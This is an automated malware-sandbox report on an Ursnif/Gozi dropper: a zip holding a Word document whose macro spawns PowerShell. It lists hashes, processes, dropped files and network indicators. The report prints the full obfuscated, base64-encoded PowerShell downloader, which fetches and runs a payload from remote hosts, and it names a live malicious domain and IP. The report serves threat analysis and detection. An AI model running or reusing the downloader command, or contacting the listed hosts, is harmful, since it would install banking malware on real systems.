analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

T_Gray_Utility.zip

Full analysis: https://app.any.run/tasks/90cf1770-3875-4458-9b60-dd2c38f3a397
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: April 15, 2019, 14:20:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
gozi
ursnif
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

8E1F375557123CDE93907778CC6EB962

SHA1:

24A2E3CBFCDD7628F0C81D416E5B0BBF6F5884AC

SHA256:

04A673395170EA780BA1E8FA84CBF1CB0A36FBE977C146349CB6E98EB355A3A7

SSDEEP:

1536:239ypLL3LSa2T47aGN/HpfQ7QMEaa9r4E8JvM6crpkJxkC9oFoGv4QUX2OgTx67x:IypX3Wa2TO/121+/6cr6PHoF8lXZgTE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • URSNIF was detected

      • PoWeRsHelL.exe (PID: 2696)
  • SUSPICIOUS

    • Creates files in the user directory

      • PoWeRsHelL.exe (PID: 2696)
    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3080)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3896)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: info_04.15.doc
ZipUncompressedSize: 154496
ZipCompressedSize: 82319
ZipCRC: 0x8c4a28c9
ZipModifyDate: 2019:04:15 13:20:15
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3080"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\T_Gray_Utility.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3896"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3080.5113\info_04.15.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2696PoWeRsHelL -e JABkAEQAUQBRAFUAWABjAEIAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAF8AUQBCACcALAAnAHQARAA0ACcALAAnAEMAQQAnACkAOwAkAGQAQQB3AEEAQQBBAFgAVQAgAD0AIAAnADgAMgAxACcAOwAkAFUARABvAEEAWABVAFUAQQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAawAnACwAJwBDACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAEIAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcARABfAFEAJwAsACcAQQAnACkAKQApADsAJABSAFUAMQBEAEMAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAZABBAHcAQQBBAEEAWABVACsAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeABlACcALAAnAC4AZQAnACkAOwAkAFUAVQBCAEQAeABfAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBYACcALAAnAHIAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAEQAJwAsACcAXwBBAG8AJwApACkAOwAkAGEAQQBBAEEAUQBBAFoAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBgAFQALgBXAEUAYABCAGMAbABJAGUAbgBUADsAJABHADQAQQB4AEEAUQBvAFoAPQAoACIAewA4AH0AewA1AH0AewA5AH0AewAzAH0AewAwAH0AewA3AH0AewAxAH0AewA2AH0AewA0AH0AewAyAH0AIgAgAC0AZgAnADEAJwAsACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQB7ADIAfQAiAC0AZgAnADEANwA2ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBrAG8AZQB4ACcALAAnAHMAJwApACwAJwAvAHAAbwAnACwAJwAuACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYwBvAG0AJwAsACcALwAnACkAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGsAJwAsACcAPwBsAD0AYwB1AHAAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALgBmAGcAJwAsACcANwAnACkAKQAsACcAcwAxACcALAAnAGgAcAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwADoALwAnACwAJwB0ACcAKQAsACcAMgAuAHAAJwAsACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwA0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGgAZQBhACcALAAnAG8AdAAnACkALAAnAHIAJwAsACcAZABvACcAKQAsACcAaAB0ACcALAAnAC8AJwApAC4AIgBTAGAAUABMAGkAdAAiACgAJwBAACcAKQA7ACQAbABHAF8AWgBBAEEAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAXwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcATwBBACcALAAnAGMAQQBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARQBBAFUAQQBBAEcAQQAgAGkAbgAgACQARwA0AEEAeABBAFEAbwBaACkAewB0AHIAeQB7ACQAYQBBAEEAQQBRAEEAWgAuACIARABPAGAAdwBOAGAAbABgAE8AYQBEAEYASQBsAEUAIgAoACQARQBBAFUAQQBBAEcAQQAsACAAJABSAFUAMQBEAEMAQQApADsAJAB0AFUAbwBBAEIAQQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAJwAsACcAQgBBAFgAJwApACkALAAnAGsAbwAnACwAJwBZACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdABlAG0AJwApACAAJABSAFUAMQBEAEMAQQApAC4AIgBMAEUAbgBgAEcAdABIACIAIAAtAGcAZQAgADMANQAxADIAMgApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACAAJABSAFUAMQBEAEMAQQA7ACQAcABEAFgAMQBrAEEAUQA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBjACcALAAnAEIAVQBYACcAKQApACwAJwBaACcAKQA7AGIAcgBlAGEAawA7ACQAWgBBAEQAXwBCADQAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdwBjADQAJwAsACcAQQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFYAQgBBACcALAAnAFUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgARwBBAEEAQQAxAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAF8AJwAsACcARABBAEEAJwApACwAJwBTAFoAQgAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 673
Read events
1 458
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD27E.tmp.cvr
MD5:
SHA256:
2696PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MTU5K5K9V1I5B40I95PZ.temp
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF055FA5F0FBF9573B.TMP
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7B5616AC3A318796.TMP
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD1B4D688E5069F2E.TMP
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D2F68E15-DB46-44FB-9186-620CAB5784D1}.tmp
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF984FC2A9888C2707.TMP
MD5:
SHA256:
3896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3111C052-0750-40E3-ACBC-B0F0B43901C8}.tmp
MD5:
SHA256:
2696PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2696PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFee0e6.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2696
PoWeRsHelL.exe
GET
404
91.240.87.19:80
http://s11dorothea4176.com/skoex/po2.php?l=cupk7.fgs
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2696
PoWeRsHelL.exe
91.240.87.19:80
s11dorothea4176.com
JSC ISPsystem
RU
suspicious

DNS requests

Domain
IP
Reputation
s11dorothea4176.com
  • 91.240.87.19
malicious

Threats

PID
Process
Class
Message
2696
PoWeRsHelL.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
1 ETPRO signatures available at the full report
No debug info